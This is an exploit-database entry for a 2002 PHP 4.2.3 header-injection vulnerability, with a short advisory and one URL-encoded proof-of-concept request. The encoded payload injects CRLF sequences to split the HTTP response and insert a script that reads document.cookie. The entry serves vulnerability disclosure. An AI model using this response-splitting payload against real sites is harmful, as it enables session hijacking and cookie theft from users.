PHP 4.2.3 - Header Function Script Injection

EDB-ID:

21776

CVE:

N/A




Platform:

PHP

Date:

2002-09-07


source: https://www.securityfocus.com/bid/5669/info

PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems.

It has been reported that a vulnerability in the PHP header function exists. It may be possible for a user to supply arbitrary script code in an URL that would allow the injection of script code into the HTTP header. 

http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%
6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2
1%2D%2D